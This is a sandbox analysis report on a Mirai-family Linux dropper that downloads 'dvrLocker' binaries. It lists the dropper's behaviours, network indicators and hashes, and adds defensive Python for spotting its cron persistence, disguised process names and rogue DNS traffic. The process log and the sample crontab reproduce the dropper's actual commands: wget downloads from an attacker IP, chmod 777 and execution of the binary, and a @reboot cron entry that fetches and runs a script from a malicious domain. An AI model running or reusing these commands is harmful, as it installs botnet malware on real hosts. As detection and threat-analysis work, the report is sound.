Analysis Overview
SHA256
7bad123032a0e9a4f6d7a399b7d7a171c24f505201186d679ca495ba936195bd
Threat Level: Known bad
The file l.sh was found to be: Known bad.
Malicious Activity Summary
Mirai family
Mirai
Unexpected DNS network traffic destination
File and Directory Permissions Modification
Renames itself
Executes dropped EXE
Creates/modifies Cron job
Enumerates running processes
Changes its process name
Reads runtime system information
Writes file to tmp directory
System Network Configuration Discovery
MITRE ATT&CK
Enterprise Matrix V15
Analysis: static1
Detonation Overview
Reported
2024-11-09 08:41
Signatures
Analysis: behavioral1
Detonation Overview
Submitted
2024-11-09 08:41
Reported
2024-11-09 08:43
Platform
ubuntu1804-amd64-20240729-en
Max time kernel
138s
Max time network
146s
Command Line
Signatures
Mirai
Mirai family
File and Directory Permissions Modification
| Description | Indicator | Process | Target |
| N/A | N/A | /bin/chmod (24 events) | N/A |
| N/A | N/A | /bin/sh (3 events) | N/A |
Executes dropped EXE
| Description | Indicator | Process | Target |
| N/A | /tmp/lib/dvrLocker | /tmp/lib/dvrLocker (8 events) | N/A |
| N/A | /mnt/dvrLocker | /mnt/dvrLocker (16 events) | N/A |
Renames itself
| Description | Indicator | Process | Target |
| N/A | N/A | /tmp/lib/dvrLocker | N/A |
| N/A | N/A | /mnt/dvrLocker | N/A |
| N/A | N/A | /mnt/dvrLocker | N/A |
Unexpected DNS network traffic destination
| Description | Indicator | Process | Target |
| Destination IP | 5.161.109.23 | N/A | N/A |
| Destination IP | 202.61.197.122 | N/A | N/A |
| Destination IP | 64.176.6.48 | N/A | N/A |
These three hosts receive port-53 queries for kingstonwikkerink.dyn (see the Network table below), while the sandbox's own lookups go to 1.1.1.1. The .dyn top-level domain is not delegated in the public DNS root, so the sample cannot resolve its C2 name through the system resolver and carries its own resolver list; port-53 traffic to anything other than the configured nameservers is the indicator to alert on.
Creates/modifies Cron job
| Description | Indicator | Process | Target |
| File opened for modification | /var/spool/cron/crontabs/tmp.kwgToV | /usr/bin/crontab | N/A |
| File opened for modification | /var/spool/cron/crontabs/tmp.jeG6xK | /usr/bin/crontab | N/A |
| File opened for modification | /var/spool/cron/crontabs/tmp.k7lYiR | /usr/bin/crontab | N/A |
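The crontab the dropper installs (the `sh -c (crontab -l ; echo "@reboot cd /tmp; wget ...") | crontab -` entries under Processes) is the persistence artefact to hunt for on other hosts. The following Python is an added example, not code from this report or from the sample: it parses crontab text and ranks entries that fetch something from the network and run it. SAMPLE_CRONTAB is constructed; its @reboot line is the one observed here, the other entries are invented, and the flag names are this example's own.

```python
"""Rank crontab entries that download and run something, like the @reboot line
this dropper installs. Added example, not part of the sandbox report.
"""
import re

URL_RE = re.compile(r"https?://[^\s\"';|&)]+")
DOWNLOADER_RE = re.compile(r"\b(wget|curl|tftp|ftpget)\b")
# /tmp, /var/tmp, /dev/shm, /mnt as whole path components (not /tmpfoo, not /var/tmp matched twice)
STAGING_RE = re.compile(r"(?<![\w./-])(/tmp|/var/tmp|/dev/shm|/mnt)(?![\w.-])")
# chmod with an octal mode or a +x grant
CHMOD_RE = re.compile(r"\bchmod\s+(?:[ugoa]*\+\w*x|[0-7]{3,4})")
SPECIALS = {"@reboot", "@yearly", "@annually", "@monthly", "@weekly",
            "@daily", "@midnight", "@hourly"}


def split_entry(line: str, system_crontab: bool = False):
    """(schedule, command) for one crontab line, or None for blanks, comments and
    VAR=value lines. User crontabs (crontab -l) have five time fields or one
    @special before the command; /etc/crontab and /etc/cron.d files carry an
    extra user field, which system_crontab=True accounts for."""
    line = line.strip()
    if not line or line.startswith("#") or re.match(r"^\w+\s*=", line):
        return None
    n_fields = 1 if line.startswith("@") else 5
    if system_crontab:
        n_fields += 1
    parts = line.split(None, n_fields)
    if len(parts) <= n_fields:
        return None
    if line.startswith("@"):
        if parts[0] not in SPECIALS:
            return None
        schedule = parts[0]
    else:
        schedule = " ".join(parts[:5])
    return schedule, parts[-1]


def assess(schedule: str, command: str) -> dict:
    """Attach flags to one entry; the flag names are this example's own."""
    flags = set()
    urls = sorted(set(URL_RE.findall(command)))
    if urls and DOWNLOADER_RE.search(command):
        flags.add("downloads-from-url")
    if STAGING_RE.search(command):
        flags.add("runs-in-staging-dir")
    if CHMOD_RE.search(command):
        flags.add("changes-mode")
    if schedule == "@reboot":
        flags.add("fires-at-reboot")
    return {"schedule": schedule, "command": command, "urls": urls,
            "flags": flags, "score": len(flags)}


def suspicious_entries(crontab_text: str, system_crontab: bool = False) -> list:
    """Entries that fetch from the network, in file order; a higher score means
    more of the dropper's traits (boot trigger, /tmp, chmod) are present."""
    hits = []
    for line in crontab_text.splitlines():
        parsed = split_entry(line, system_crontab)
        if parsed is None:
            continue
        entry = assess(*parsed)
        if "downloads-from-url" in entry["flags"]:
            hits.append(entry)
    return hits


# Constructed sample: the @reboot line is the one this report shows, the rest is invented.
SAMPLE_CRONTAB = """\
# DO NOT EDIT THIS FILE - edit the master and reinstall.
MAILTO=ops@example.invalid
0 3 * * * /usr/bin/certbot renew --quiet
*/5 * * * * /usr/local/bin/backup.sh >/dev/null 2>&1
0 * * * * curl -s https://status.example.invalid/ping
@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh
"""

if __name__ == "__main__":
    for hit in sorted(suspicious_entries(SAMPLE_CRONTAB), key=lambda h: -h["score"]):
        print(hit["score"], hit["schedule"], hit["urls"], sorted(hit["flags"]))
```

Run it over `crontab -l -u <user>` output for every user and, with `system_crontab=True`, over /etc/crontab and /etc/cron.d/*. A benign heartbeat that only curls a URL scores 1; the entry this sample writes scores 4 because it also fires at boot, works in /tmp and makes its download executable.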
Changes its process name
| Description | Indicator | Process | Target |
| Changes the process name, possibly in an attempt to hide itself | [kswapd0] | /tmp/lib/dvrLocker | N/A |
| Changes the process name, possibly in an attempt to hide itself | mini_httpd | /mnt/dvrLocker | N/A |
| Changes the process name, possibly in an attempt to hide itself | [kswapd0] | /mnt/dvrLocker | N/A |
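dvrLocker hides behind a kernel-thread name ("[kswapd0]") or a daemon name ("mini_httpd") while its binary sits in /tmp/lib or /mnt. On a live host the give-away is the gap between what /proc/<pid>/comm and /proc/<pid>/cmdline claim and what /proc/<pid>/exe resolves to. The following Python is an added example, not code from this report or from the sample; SAMPLE_SNAPSHOT is constructed to mirror the behaviour above, its PIDs are invented, and the reason codes and the ARGV_REWRITERS allowlist are this example's own.

```python
"""Flag processes whose displayed name does not match the binary they execute.
Added example (not from the sandbox report). SAMPLE_SNAPSHOT is constructed;
snapshot_live() reads the same fields from a real /proc on Linux.
"""
from __future__ import annotations

import os
import re
from dataclasses import dataclass
from typing import Optional

# Locations a legitimate long-running daemon should not be executing from.
STAGING_DIRS = ("/tmp/", "/var/tmp/", "/dev/shm/", "/mnt/")
# ps shows real kernel threads in brackets because their cmdline is empty; a
# process whose cmdline literally contains "[name]" is imitating one.
FAKE_KTHREAD_RE = re.compile(r"^\[[^\]]+\]$")
# Daemons known to rewrite their own argv (sshd session processes, for instance).
# Extend this allowlist for your fleet rather than loosening the check.
ARGV_REWRITERS = {"/usr/sbin/sshd"}


@dataclass
class Proc:
    pid: int
    comm: str            # /proc/<pid>/comm, 15 bytes max, what ps/top display
    argv0: str           # first NUL-separated field of /proc/<pid>/cmdline ("" for kernel threads)
    exe: Optional[str]   # os.readlink("/proc/<pid>/exe"); None when there is no user-space image


def findings_for(p: Proc) -> list[tuple[int, str]]:
    """Return (pid, reason) pairs; an empty list means the process looks honest."""
    if p.exe is None:
        return []                                    # genuine kernel thread: nothing to compare
    out = []
    exe = p.exe
    if exe.endswith(" (deleted)"):                   # binary unlinked after exec, as the rm -rf lines above do
        out.append((p.pid, "exe-deleted"))
        exe = exe[: -len(" (deleted)")]
    real = os.path.basename(exe)
    shown = os.path.basename(p.argv0)
    if FAKE_KTHREAD_RE.match(p.argv0):
        out.append((p.pid, "kthread-imitation"))
    elif shown != real and exe not in ARGV_REWRITERS:
        out.append((p.pid, "argv0-exe-mismatch"))
    if p.comm not in (real[:15], shown[:15]):        # the kernel truncates comm to 15 bytes
        out.append((p.pid, "comm-exe-mismatch"))
    if exe.startswith(STAGING_DIRS):
        out.append((p.pid, "staging-dir"))
    return out


def scan(procs: list[Proc]) -> list[tuple[int, str]]:
    return [f for p in procs for f in findings_for(p)]


def snapshot_live() -> list[Proc]:
    """Collect Proc records from a live Linux /proc. Run as root: without
    CAP_SYS_PTRACE, readlink on another user's exe fails and that process
    would be mis-filed as a kernel thread."""
    procs = []
    for name in os.listdir("/proc"):
        if not name.isdigit():
            continue
        pid = int(name)
        try:
            with open(f"/proc/{pid}/comm") as f:
                comm = f.read().rstrip("\n")
            with open(f"/proc/{pid}/cmdline", "rb") as f:
                argv0 = f.read().split(b"\0", 1)[0].decode(errors="replace")
        except OSError:
            continue                                 # exited while we were looking
        try:
            exe = os.readlink(f"/proc/{pid}/exe")
        except OSError:
            exe = None
        procs.append(Proc(pid, comm, argv0, exe))
    return procs


# Constructed snapshot modelled on this report; PIDs are invented.
SAMPLE_SNAPSHOT = [
    Proc(22, "sshd", "/usr/sbin/sshd", "/usr/sbin/sshd"),
    Proc(35, "kswapd0", "", None),                                   # the real kswapd0
    Proc(1200, "sshd", "sshd: root@pts/0", "/usr/sbin/sshd"),        # benign argv rewrite
    Proc(901, "kswapd0", "[kswapd0]", "/mnt/dvrLocker (deleted)"),   # dvrLocker posing as a kernel thread
    Proc(902, "mini_httpd", "mini_httpd", "/tmp/lib/dvrLocker"),     # dvrLocker posing as a web server
]

if __name__ == "__main__":
    for pid, reason in scan(SAMPLE_SNAPSHOT):
        print(pid, reason)
```

The real kswapd0 is never flagged because it has no exe link at all; the impostor is caught three ways (bracketed argv0, comm that matches neither name, binary in /mnt) and a fourth time once the dropper's `rm -rf` has unlinked it. Daemons that legitimately rewrite argv need the allowlist, keyed on the exe path rather than the name they display.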
Reads runtime system information
| Description | Indicator | Process | Target |
| File opened for reading | /proc/filesystems | /bin/ls (64 events) | N/A |
System Network Configuration Discovery
| Description | Indicator | Process | Target |
| N/A | N/A | /usr/bin/wget (3 events) | N/A |
| N/A | N/A | /bin/rm (3 events) | N/A |
Writes file to tmp directory
| Description | Indicator | Process | Target |
| File opened for modification | /tmp/lib/dvrLocker | /tmp/l.sh | N/A |
Processes
/tmp/l.sh
[/tmp/l.sh]
/bin/ls
[ls -l /proc/1/exe]
/bin/ls
[ls -l /proc/10/exe]
/bin/ls
[ls -l /proc/1017/exe]
/bin/ls
[ls -l /proc/1022/exe]
/bin/ls
[ls -l /proc/1036/exe]
/bin/ls
[ls -l /proc/1042/exe]
/bin/ls
[ls -l /proc/1056/exe]
/bin/ls
[ls -l /proc/1060/exe]
/bin/ls
[ls -l /proc/1063/exe]
/bin/ls
[ls -l /proc/1066/exe]
/bin/ls
[ls -l /proc/1070/exe]
/bin/ls
[ls -l /proc/1080/exe]
/bin/ls
[ls -l /proc/1084/exe]
/bin/ls
[ls -l /proc/1093/exe]
/bin/ls
[ls -l /proc/11/exe]
/bin/ls
[ls -l /proc/1108/exe]
/bin/ls
[ls -l /proc/1113/exe]
/bin/ls
[ls -l /proc/1117/exe]
/bin/ls
[ls -l /proc/1121/exe]
/bin/ls
[ls -l /proc/1125/exe]
/bin/ls
[ls -l /proc/1129/exe]
/bin/ls
[ls -l /proc/1133/exe]
/bin/ls
[ls -l /proc/1138/exe]
/bin/ls
[ls -l /proc/1142/exe]
/bin/ls
[ls -l /proc/1143/exe]
/bin/ls
[ls -l /proc/1146/exe]
/bin/ls
[ls -l /proc/1149/exe]
/bin/ls
[ls -l /proc/115/exe]
/bin/ls
[ls -l /proc/1151/exe]
/bin/ls
[ls -l /proc/1161/exe]
/bin/ls
[ls -l /proc/1163/exe]
/bin/ls
[ls -l /proc/1165/exe]
/bin/ls
[ls -l /proc/1166/exe]
/bin/ls
[ls -l /proc/1171/exe]
/bin/ls
[ls -l /proc/1179/exe]
/bin/ls
[ls -l /proc/1182/exe]
/bin/ls
[ls -l /proc/1183/exe]
/bin/ls
[ls -l /proc/1184/exe]
/bin/ls
[ls -l /proc/1185/exe]
/bin/ls
[ls -l /proc/1188/exe]
/bin/ls
[ls -l /proc/1191/exe]
/bin/ls
[ls -l /proc/12/exe]
/bin/ls
[ls -l /proc/1226/exe]
/bin/ls
[ls -l /proc/1228/exe]
/bin/ls
[ls -l /proc/1255/exe]
/bin/ls
[ls -l /proc/1256/exe]
/bin/ls
[ls -l /proc/1269/exe]
/bin/ls
[ls -l /proc/1282/exe]
/bin/ls
[ls -l /proc/1287/exe]
/bin/ls
[ls -l /proc/1297/exe]
/bin/ls
[ls -l /proc/13/exe]
/bin/ls
[ls -l /proc/1308/exe]
/bin/ls
[ls -l /proc/1313/exe]
/bin/ls
[ls -l /proc/1317/exe]
/bin/ls
[ls -l /proc/1339/exe]
/bin/ls
[ls -l /proc/1349/exe]
/bin/ls
[ls -l /proc/137/exe]
/bin/ls
[ls -l /proc/1379/exe]
/bin/ls
[ls -l /proc/14/exe]
/bin/ls
[ls -l /proc/1478/exe]
/bin/ls
[ls -l /proc/1497/exe]
/bin/ls
[ls -l /proc/15/exe]
/bin/ls
[ls -l /proc/1503/exe]
/bin/ls
[ls -l /proc/1505/exe]
/bin/ls
[ls -l /proc/1506/exe]
/bin/ls
[ls -l /proc/1507/exe]
/bin/ls
[ls -l /proc/1509/exe]
/bin/ls
[ls -l /proc/159/exe]
/bin/ls
[ls -l /proc/16/exe]
/bin/ls
[ls -l /proc/160/exe]
/bin/ls
[ls -l /proc/161/exe]
/bin/ls
[ls -l /proc/162/exe]
/bin/ls
[ls -l /proc/163/exe]
/bin/ls
[ls -l /proc/164/exe]
/bin/ls
[ls -l /proc/165/exe]
/bin/ls
[ls -l /proc/166/exe]
/bin/ls
[ls -l /proc/167/exe]
/bin/ls
[ls -l /proc/168/exe]
/bin/ls
[ls -l /proc/169/exe]
/bin/ls
[ls -l /proc/17/exe]
/bin/ls
[ls -l /proc/170/exe]
/bin/ls
[ls -l /proc/171/exe]
/bin/ls
[ls -l /proc/172/exe]
/bin/ls
[ls -l /proc/173/exe]
/bin/ls
[ls -l /proc/174/exe]
/bin/ls
[ls -l /proc/175/exe]
/bin/ls
[ls -l /proc/176/exe]
/bin/ls
[ls -l /proc/178/exe]
/bin/ls
[ls -l /proc/18/exe]
/bin/ls
[ls -l /proc/19/exe]
/bin/ls
[ls -l /proc/2/exe]
/bin/ls
[ls -l /proc/20/exe]
/bin/ls
[ls -l /proc/203/exe]
/bin/ls
[ls -l /proc/204/exe]
/bin/ls
[ls -l /proc/21/exe]
/bin/ls
[ls -l /proc/22/exe]
/bin/ls
[ls -l /proc/23/exe]
/bin/ls
[ls -l /proc/24/exe]
/bin/ls
[ls -l /proc/244/exe]
/bin/ls
[ls -l /proc/25/exe]
/bin/ls
[ls -l /proc/26/exe]
/bin/ls
[ls -l /proc/269/exe]
/bin/ls
[ls -l /proc/27/exe]
/bin/ls
[ls -l /proc/28/exe]
/bin/ls
[ls -l /proc/29/exe]
/bin/ls
[ls -l /proc/3/exe]
/bin/ls
[ls -l /proc/30/exe]
/bin/ls
[ls -l /proc/309/exe]
/bin/ls
[ls -l /proc/31/exe]
/bin/ls
[ls -l /proc/313/exe]
/bin/ls
[ls -l /proc/32/exe]
/bin/ls
[ls -l /proc/34/exe]
/bin/ls
[ls -l /proc/35/exe]
/bin/ls
[ls -l /proc/36/exe]
/bin/ls
[ls -l /proc/4/exe]
/bin/ls
[ls -l /proc/405/exe]
/bin/ls
[ls -l /proc/412/exe]
/bin/ls
[ls -l /proc/436/exe]
/bin/ls
[ls -l /proc/443/exe]
/bin/ls
[ls -l /proc/454/exe]
/bin/ls
[ls -l /proc/457/exe]
/bin/ls
[ls -l /proc/463/exe]
/bin/ls
[ls -l /proc/466/exe]
/bin/ls
[ls -l /proc/472/exe]
/bin/ls
[ls -l /proc/473/exe]
/bin/ls
[ls -l /proc/474/exe]
/bin/ls
[ls -l /proc/476/exe]
/bin/ls
[ls -l /proc/480/exe]
/bin/ls
[ls -l /proc/484/exe]
/bin/ls
[ls -l /proc/485/exe]
/bin/ls
[ls -l /proc/487/exe]
/bin/ls
[ls -l /proc/5/exe]
/bin/ls
[ls -l /proc/516/exe]
/bin/ls
[ls -l /proc/523/exe]
/bin/ls
[ls -l /proc/535/exe]
/bin/ls
[ls -l /proc/542/exe]
/bin/ls
[ls -l /proc/552/exe]
/bin/ls
[ls -l /proc/573/exe]
/bin/ls
[ls -l /proc/597/exe]
/bin/ls
[ls -l /proc/598/exe]
/bin/ls
[ls -l /proc/6/exe]
/bin/ls
[ls -l /proc/634/exe]
/bin/ls
[ls -l /proc/648/exe]
/bin/ls
[ls -l /proc/649/exe]
/bin/ls
[ls -l /proc/651/exe]
/bin/ls
[ls -l /proc/658/exe]
/bin/ls
[ls -l /proc/670/exe]
/bin/ls
[ls -l /proc/697/exe]
/bin/ls
[ls -l /proc/7/exe]
/bin/ls
[ls -l /proc/744/exe]
/bin/ls
[ls -l /proc/757/exe]
/bin/ls
[ls -l /proc/78/exe]
/bin/ls
[ls -l /proc/79/exe]
/bin/ls
[ls -l /proc/8/exe]
/bin/ls
[ls -l /proc/80/exe]
/bin/ls
[ls -l /proc/81/exe]
/bin/ls
[ls -l /proc/82/exe]
/bin/ls
[ls -l /proc/83/exe]
/bin/ls
[ls -l /proc/84/exe]
/bin/ls
[ls -l /proc/85/exe]
/bin/ls
[ls -l /proc/89/exe]
/bin/ls
[ls -l /proc/895/exe]
/bin/ls
[ls -l /proc/9/exe]
/bin/ls
[ls -l /proc/949/exe]
/bin/ls
[ls -l /proc/950/exe]
/bin/ls
[ls -l /proc/98/exe]
/bin/ls
[ls -l /proc/985/exe]
/bin/ls
[ls -l /proc/990/exe]
/bin/ls
[ls -l /proc/993/exe]
/bin/rm
[rm -rf /tmp/lib/]
/bin/rm
[rm -rf /tmp/lib/dvrLocker]
/bin/mkdir
[mkdir /tmp/lib/]
/usr/bin/wget
[wget http://45.202.35.91/mpsl -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mpsl]
/usr/bin/wget
[wget http://45.202.35.91/mips -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mips]
/usr/bin/wget
[wget http://45.202.35.91/arm -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm]
/usr/bin/wget
[wget http://45.202.35.91/arm5 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://45.202.35.91/ppc -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://45.202.35.91/arm7 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm7]
/usr/bin/wget
[wget http://45.202.35.91/arm6 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://45.202.35.91/x86 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/tmp/lib/dvrLocker
[./dvrLocker tplink.new]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
/bin/rm
[rm -rf x86]
/bin/rm
[rm -rf /mnt/dvrLocker]
/usr/bin/wget
[wget http://45.202.35.91/mpsl -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mpsl]
/usr/bin/wget
[wget http://45.202.35.91/mips -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mips]
/usr/bin/wget
[wget http://45.202.35.91/arm -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm]
/usr/bin/wget
[wget http://45.202.35.91/arm5 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://45.202.35.91/ppc -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://45.202.35.91/arm7 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm7]
/usr/bin/wget
[wget http://45.202.35.91/arm6 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://45.202.35.91/x86 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
/bin/rm
[rm -rf x86]
/usr/bin/wget
[wget http://45.202.35.91/mpsl -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mpsl]
/usr/bin/wget
[wget http://45.202.35.91/mips -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf mips]
/usr/bin/wget
[wget http://45.202.35.91/arm -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm]
/usr/bin/wget
[wget http://45.202.35.91/arm5 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm5]
/usr/bin/wget
[wget http://45.202.35.91/ppc -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf ppc]
/usr/bin/wget
[wget http://45.202.35.91/arm7 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm7]
/usr/bin/wget
[wget http://45.202.35.91/arm6 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/rm
[rm -rf arm6]
/usr/bin/wget
[wget http://45.202.35.91/x86 -O -]
/bin/chmod
[chmod 777 dvrLocker]
/mnt/dvrLocker
[./dvrLocker tplink.new]
/bin/sh
[sh -c (crontab -l ; echo "@reboot cd /tmp; wget http://hailcocks.ru/wget.sh; curl --output wget.sh http://hailcocks.ru/wget.sh; chmod 777 wget.sh; ./wget.sh") | crontab -]
/usr/bin/crontab
[crontab -]
/usr/bin/crontab
[crontab -l]
/bin/rm
[rm -rf x86]
Network
| Country | Destination | Domain | Proto |
| N/A | 224.0.0.251:5353 | | udp |
| US | 151.101.129.91:443 | | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| GB | 185.125.188.61:443 | | tcp |
| GB | 185.125.188.62:443 | | tcp |
| US | 151.101.129.91:443 | | tcp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| GB | 89.187.167.38:443 | | tcp |
| US | 1.1.1.1:53 (2 queries) | 1527653184.rsc.cdn77.org | udp |
| UA | 45.202.35.91:80 | 45.202.35.91 | tcp |
| GB | 89.187.167.38:443 | 1527653184.rsc.cdn77.org | tcp |
| UA | 45.202.35.91:80 (5 connections) | 45.202.35.91 | tcp |
| US | 5.161.109.23:53 | kingstonwikkerink.dyn | udp |
| UA | 45.202.35.91:80 (8 connections) | 45.202.35.91 | tcp |
| CL | 64.176.6.48:53 | kingstonwikkerink.dyn | udp |
| UA | 45.202.35.91:80 (8 connections) | 45.202.35.91 | tcp |
| DE | 202.61.197.122:53 | kingstonwikkerink.dyn | udp |
| HK | 193.233.193.45:14781 | kingstonwikkerink.dyn | tcp |
| CN | 43.226.79.41:62371 | | udp |
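The table shows the pattern the "Unexpected DNS network traffic destination" signature fires on: the sandbox's own lookups go to 1.1.1.1, the sample sends port-53 queries to three other hosts, and the only connection that follows those queries is the TCP session to 193.233.193.45:14781. The following Python is an added example, not code from this report: it reproduces that reasoning over flow records. FLOWS is constructed from the rows above, and RESOLV_CONF is an assumption (the report does not show the sandbox's resolver configuration; 1.1.1.1 is assumed because the sandbox's background lookups went there).

```python
"""Find DNS traffic that bypasses the host's configured resolvers and the
connections that follow it. Added example, not part of the sandbox report;
RESOLV_CONF is assumed and FLOWS is constructed from the report's Network table.
"""
from __future__ import annotations

import ipaddress
from collections import defaultdict

# Assumption: the sandbox resolves through 1.1.1.1 (constructed, not from the report).
RESOLV_CONF = """\
nameserver 1.1.1.1
"""

# (proto, dst_ip, dst_port, name associated with the flow or None), from the table above
FLOWS = [
    ("udp", "224.0.0.251", 5353, None),                       # mDNS, multicast, not unicast DNS
    ("tcp", "45.202.35.91", 80, "45.202.35.91"),              # payload host, fetched by IP
    ("udp", "1.1.1.1", 53, "1527653184.rsc.cdn77.org"),       # OS background lookup at the expected resolver
    ("tcp", "89.187.167.38", 443, "1527653184.rsc.cdn77.org"),
    ("udp", "5.161.109.23", 53, "kingstonwikkerink.dyn"),
    ("udp", "64.176.6.48", 53, "kingstonwikkerink.dyn"),
    ("udp", "202.61.197.122", 53, "kingstonwikkerink.dyn"),
    ("tcp", "193.233.193.45", 14781, "kingstonwikkerink.dyn"),
]


def nameservers(resolv_conf: str) -> set[str]:
    """Resolver addresses from resolv.conf text; malformed lines are ignored."""
    out = set()
    for line in resolv_conf.splitlines():
        parts = line.split()
        if len(parts) >= 2 and parts[0] == "nameserver":
            try:
                out.add(str(ipaddress.ip_address(parts[1])))
            except ValueError:
                pass
    return out


def is_dns(proto: str, dst_ip: str, dst_port: int) -> bool:
    # Unicast port 53 over udp or tcp. mDNS (5353) and multicast destinations are
    # different protocols and would only add noise here.
    return dst_port == 53 and proto in ("udp", "tcp") \
        and not ipaddress.ip_address(dst_ip).is_multicast


def unexpected_resolvers(flows, allowed: set[str]) -> dict[str, set]:
    """Rogue resolver IP -> names queried through it."""
    rogue = defaultdict(set)
    for proto, ip, port, name in flows:
        if is_dns(proto, ip, port) and ip not in allowed:
            rogue[ip].add(name)
    return dict(rogue)


def names_only_resolved_rogue(flows, allowed: set[str]) -> set[str]:
    """Names never seen at an allowed resolver: the sample's own infrastructure."""
    via_ok, via_rogue = set(), set()
    for proto, ip, port, name in flows:
        if is_dns(proto, ip, port) and name:
            (via_ok if ip in allowed else via_rogue).add(name)
    return via_rogue - via_ok


def follow_on_connections(flows, names: set[str]) -> list[tuple[str, int, str]]:
    """Non-DNS flows tied to those names: where the sample went after resolving them."""
    return [(ip, port, proto) for proto, ip, port, name in flows
            if name in names and not is_dns(proto, ip, port)]


if __name__ == "__main__":
    allowed = nameservers(RESOLV_CONF)
    rogue = unexpected_resolvers(FLOWS, allowed)
    c2_names = names_only_resolved_rogue(FLOWS, allowed)
    print("rogue resolvers:", sorted(rogue))
    print("names resolved only via rogue resolvers:", sorted(c2_names))
    print("follow-on connections:", follow_on_connections(FLOWS, c2_names))
```

Feed it Zeek conn/dns records or a pcap's flows in the same tuple shape; on a production network the allowed set is the DHCP-issued or corporate resolvers, and the egress firewall should drop port 53 to anything else so that a sample with its own resolver list fails at the first step.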
Files
/tmp/lib/dvrLocker
| MD5 | 4ad582d49f505bfab7de84881998685b |
| SHA1 | 5f09f4baed114b594729ded91e2c4d263f0e2754 |
| SHA256 | b1e8713db49c15b272baa11e5569ecb4f22fd6064f5aa59ed236d0af58f159a1 |
| SHA512 | 6f35bfb8aca5fd02f6e690fe0628595531dba7463265b1a66ff801c7744690f3317f611ab07e45fdfc28a17a32a891de92b1d026de30bf327aa304395b0905f4 |
/tmp/lib/dvrLocker
| MD5 | 559f129d380ad1cfb60792c6b2dc3d32 |
| SHA1 | 3997a0fc0bd5958783f1751364ec407c5b170adc |
| SHA256 | fbdbd0392519e49a09e647d8c83046fb15d6dcbb8246ee2f813d10018ba8ac3d |
| SHA512 | 9f5c39334121b5bde6a282f47b92a841130627f1554ff5089005c371af4c2be5ddc467ad594013fa2fb70a55172b6ba7a6caf50c0cba56564170e482955dc112 |
/tmp/lib/dvrLocker
| MD5 | d09db60a70d5b53b5b53ad39476fd7e8 |
| SHA1 | 73a75e5e8200f77d857a7256cc0979077e29241d |
| SHA256 | 36b5ad3793ba15e920ea49a43467610bfce85149afc12af166a56bb2011a9165 |
| SHA512 | ea6156cf3b4480fef088a1fefd8bd1845418606a412a8ab883734e2d297e6169de35456ecd2a5738967ef310066482069262171329624d28184a919cefb21c04 |
/tmp/lib/dvrLocker
| MD5 | f812a7b3a877f717eb6e54b843b41848 |
| SHA1 | 21ee67d9a9b638621646e1b57fdc0f1eb0bdfa25 |
